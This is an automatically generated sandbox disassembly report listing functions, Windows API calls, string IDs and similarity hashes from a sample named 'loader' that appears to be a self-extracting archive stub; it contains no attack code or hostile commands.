              Function 0012F290 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
              Download Yara Rule
              APIs
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,0012F5EF,?,00000000,?), ref: 0012F343
              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0012F5EF,?,00000000,?,00000000,00000000,?,00000000), ref: 0012F371
              • GetLastError.KERNEL32(?,0012F5EF,?,00000000,?,00000000,00000000,?,00000000), ref: 0012F3A2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharErrorFileLastMultiWideWrite
              • String ID: ^PpL
              • API String ID: 2456169464-914357616
              • Opcode ID: 04687d1e8d6c0ea57f6bacd47d4efcb4439ecc3efcc4f9c892c4492649418f81
              • Instruction ID: e7c3ce27b89bc5bc7eb424db44776108c294c4e7d5779273ba6360360b6be9fd
              • Opcode Fuzzy Hash: 04687d1e8d6c0ea57f6bacd47d4efcb4439ecc3efcc4f9c892c4492649418f81
              • Instruction Fuzzy Hash: B3315E75A002199FDB28CF59DC919EAB7B8FB58310F1444BDE90AD7250D730AE95CF60
              Function 00107574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00107579
                • Part of subcall function 00103B3D: __EH_prolog.LIBCMT ref: 00103B42
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00107640
                • Part of subcall function 00107BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00107C04
                • Part of subcall function 00107BF5: GetLastError.KERNEL32 ref: 00107C4A
                • Part of subcall function 00107BF5: CloseHandle.KERNEL32(?), ref: 00107C59
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              • API String ID: 3813983858-639343689
              • Opcode ID: d8485f89af432dce352f340d9b254b6e604cc5fc2a16cd2c15df1b50121da1d1
              • Instruction ID: de3201c8c31c46109118fde784e9209c9175f9e796653de34d9cdede25acdac6
              • Opcode Fuzzy Hash: d8485f89af432dce352f340d9b254b6e604cc5fc2a16cd2c15df1b50121da1d1
              • Instruction Fuzzy Hash: AC31F871D08248AEEF21EB64DC01BEEBBB9BF29354F004065F485A71D2DBF55984CB61
              Function 0011A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • EndDialog.USER32(?,00000001), ref: 0011A4B8
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0011A4CD
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0011A4E2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              • API String ID: 445417207-3402441367
              • Opcode ID: f2d73fdfa9626c81829b7ed42676cf120318cd135a761b29f1eed5005e8fcd86
              • Instruction ID: 23244270c2e52764123870b24dbe216c36da4c026b7b2e942e0de5edf8e939a9
              • Opcode Fuzzy Hash: f2d73fdfa9626c81829b7ed42676cf120318cd135a761b29f1eed5005e8fcd86
              • Instruction Fuzzy Hash: ED11E9322456107FD6269FA8DD4DFA63F69EF5A300F580064F340978A0C7E55881D722
              Function 0010D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              • API String ID: 1857242416-834177443
              • Opcode ID: 23f4a01e708093256b815651ecb8f5726b0019624514a50c3e7dde5f791b4e17
              • Instruction ID: 4ff23545077069367130746844bc457dbaaaf9efce4ead634efd82bfd1d82879
              • Opcode Fuzzy Hash: 23f4a01e708093256b815651ecb8f5726b0019624514a50c3e7dde5f791b4e17
              • Instruction Fuzzy Hash: EB218E3244020CEAEB20EEE4ED46FEE7BA8AF15300F040522FA54961D2E7B1DA59DB51
              Function 0011A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • EndDialog.USER32(?,00000001), ref: 0011A9DE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0011A9F6
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0011AA24
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              • API String ID: 445417207-3292211884
              • Opcode ID: aa617a708829d62b31784c29e98024c725610446b0c3b82f2efee2c652f421bf
              • Instruction ID: 2c11d48c33e04c806e16165a696ff38028679995a78cdef92d37e53198aca148
              • Opcode Fuzzy Hash: aa617a708829d62b31784c29e98024c725610446b0c3b82f2efee2c652f421bf
              • Instruction Fuzzy Hash: 7D1148329411287ADB299E64AE09FFA3F6CEF09311F410031FA45B34C0C3B199D4D6A2
              Function 0010B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
              Download Yara Rule
              APIs
              • _swprintf.LIBCMT ref: 0010B51E
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • _wcschr.LIBVCRUNTIME ref: 0010B53C
              • _wcschr.LIBVCRUNTIME ref: 0010B54C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              • API String ID: 525462905-3142399695
              • Opcode ID: 9797ec0c9f106b929d987571a905c1c04937c5978a244c97799687ad1480be6b
              • Instruction ID: 9e8ad2b9387e750e46ba6603a47abe7bb3364688a07b4d717ba191b62b076eff
              • Opcode Fuzzy Hash: 9797ec0c9f106b929d987571a905c1c04937c5978a244c97799687ad1480be6b
              • Instruction Fuzzy Hash: D801F973908311BAD720AB75ACC3C6BB7ACEEA6360B504456F985C60C1FB74D950C2A1
              Function 001106BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
              Download Yara Rule
              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0010ABC5,00000008,?,00000000,?,0010CB88,?,00000000), ref: 001106F3
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0010ABC5,00000008,?,00000000,?,0010CB88,?,00000000), ref: 001106FD
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0010ABC5,00000008,?,00000000,?,0010CB88,?,00000000), ref: 0011070D
              Strings
              • Thread pool initialization failed., xrefs: 00110725
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              • API String ID: 3340455307-2182114853
              • Opcode ID: 4b59b72bb38adac5601853a576086db177f1bdb753eb53a37b20aa1ac6e7f4cc
              • Instruction ID: 569c0de8c794e77af274721fa2fa3fcb757cfd07fba2e397430b40f533079fa8
              • Opcode Fuzzy Hash: 4b59b72bb38adac5601853a576086db177f1bdb753eb53a37b20aa1ac6e7f4cc
              • Instruction Fuzzy Hash: 021173B1900709AFC3255F65D884AA7FBECEB59755F10482EF1DA86240D7B169C0CB64
              Function 0011D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              • API String ID: 0-56093855
              • Opcode ID: 493e265459cc9fc8d4eb3d12d972c95181055824bebe77efebb596cf6533cb71
              • Instruction ID: 5d07c25d670d2fe040576e78cc0c21463ce24675c2ce3c910c31a6d0d14f7c77
              • Opcode Fuzzy Hash: 493e265459cc9fc8d4eb3d12d972c95181055824bebe77efebb596cf6533cb71
              • Instruction Fuzzy Hash: 0F01B175614245AFCB158F29FD44B9A3BA9F70A391F080431F905E2A30C771ACD0EBA1
              Function 0011D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
              Download Yara Rule
              APIs
              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0011D29D
              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0011D2D9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar
              • API String ID: 1431749950-3493335439
              • Opcode ID: f98f0c05e6c76a7559f87b996f59c3edd2b23dee72aff0a5f2dac6de747f219d
              • Instruction ID: 10cbdcc913448bea9959aaaa2bbf0e97fef36dee33c8f601e185ce146be0198f
              • Opcode Fuzzy Hash: f98f0c05e6c76a7559f87b996f59c3edd2b23dee72aff0a5f2dac6de747f219d
              • Instruction Fuzzy Hash: FEF0A772800228E6D7242FD09C0AEFA7759EF19B51B040425FC8456181D771CD80DAF1
              Function 001291DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
              • Instruction ID: 914f4488f01b688209b76ca1b6bfc5e606a8a5fc6f0140526449863d16f7b469
              • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
              • Instruction Fuzzy Hash: 47A177329043A69FEB25DF6CE8917AEBBE5FF61310F18416DE8859B281C3389D52C750
              Function 0010A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,001080B7,?,?,?), ref: 0010A351
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,001080B7,?,?), ref: 0010A395
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,001080B7,?,?,?,?,?,?,?,?), ref: 0010A416
              • CloseHandle.KERNEL32(?,?,00000000,?,001080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0010A41D
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              • API String ID: 2287278272-0
              • Opcode ID: 51b27861e85323ef91989b003653bbb35dfd4a2b72f4b0225ab76e8ca5af546d
              • Instruction ID: e0027549bcfde982610221a5504d89d0c19d2f90442dd54a963ff569b6dfde0b
              • Opcode Fuzzy Hash: 51b27861e85323ef91989b003653bbb35dfd4a2b72f4b0225ab76e8ca5af546d
              • Instruction Fuzzy Hash: 1D41CE31248380AAD721DF24CC55BEEBBE8AF95700F48091CB5D0D71C1D7A49A889B53
              Function 00122503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 0012251A
                • Part of subcall function 00122B52: ___AdjustPointer.LIBCMT ref: 00122B9C
              • _UnwindNestedFrames.LIBCMT ref: 00122531
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00122543
              • CallCatchBlock.LIBVCRUNTIME ref: 00122567
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction ID: a5dcaf9a72e5af537439007c9d6a167e780c38a999e5b96b0db31fab9da314c3
              • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction Fuzzy Hash: 93011732000118BBCF129F55EC01EDE3BBAEF69714F058124F91866120C376E9B2EBA1
              Function 00119DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • GetDC.USER32(00000000), ref: 00119DBE
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00119DCD
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00119DDB
              • ReleaseDC.USER32(00000000,00000000), ref: 00119DE9
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              • Opcode ID: a6e7c047aecc07c0389917627e0239889d11eda3d18822e60ba4cdd1bb39c57a
              • Instruction ID: 2761decc534f76595adda9d905c7f5ab098dd24bf79a64ccd426f61c55a62b4d
              • Opcode Fuzzy Hash: a6e7c047aecc07c0389917627e0239889d11eda3d18822e60ba4cdd1bb39c57a
              • Instruction Fuzzy Hash: 98E0EC35985A21A7D7201BA5BD0DB8F3B54AB0A762F090015FA05A65A0DAB04485CB90
              Function 00122016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
              Download Yara Rule
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00122016
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0012201B
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00122020
                • Part of subcall function 0012310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0012311F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00122035
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction ID: 0ecd558719c1cf88c50675f329f6b618ba3f115d4463742ab3810a53ae391df7
              • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction Fuzzy Hash: B9C048241046B0F41C223BB232026BE0B001D73BC4BA225C2F9A017143DF2E0B3AA13A
              Function 00119F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00119DF1: GetDC.USER32(00000000), ref: 00119DF5
                • Part of subcall function 00119DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00119E00
                • Part of subcall function 00119DF1: ReleaseDC.USER32(00000000,00000000), ref: 00119E0B
              • GetObjectW.GDI32(?,00000018,?), ref: 00119F8D
                • Part of subcall function 0011A1E5: GetDC.USER32(00000000), ref: 0011A1EE
                • Part of subcall function 0011A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0011A21D
                • Part of subcall function 0011A1E5: ReleaseDC.USER32(00000000,?), ref: 0011A2B5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              • API String ID: 1061551593-3887548279
              • Opcode ID: 5d076b4385d266b23f77d95d3e528d2e8d0cb68552cd14a9a3913fe31c32379c
              • Instruction ID: eec6f309d46a66d174eb0a5a23c624a0d9fa30bded3a916b1abe3f7b8018dbac
              • Opcode Fuzzy Hash: 5d076b4385d266b23f77d95d3e528d2e8d0cb68552cd14a9a3913fe31c32379c
              • Instruction Fuzzy Hash: E5812171208614AFC718DF68CC44A6BBBE9FF88710F00492DF99AD7260DB74AD45DB62
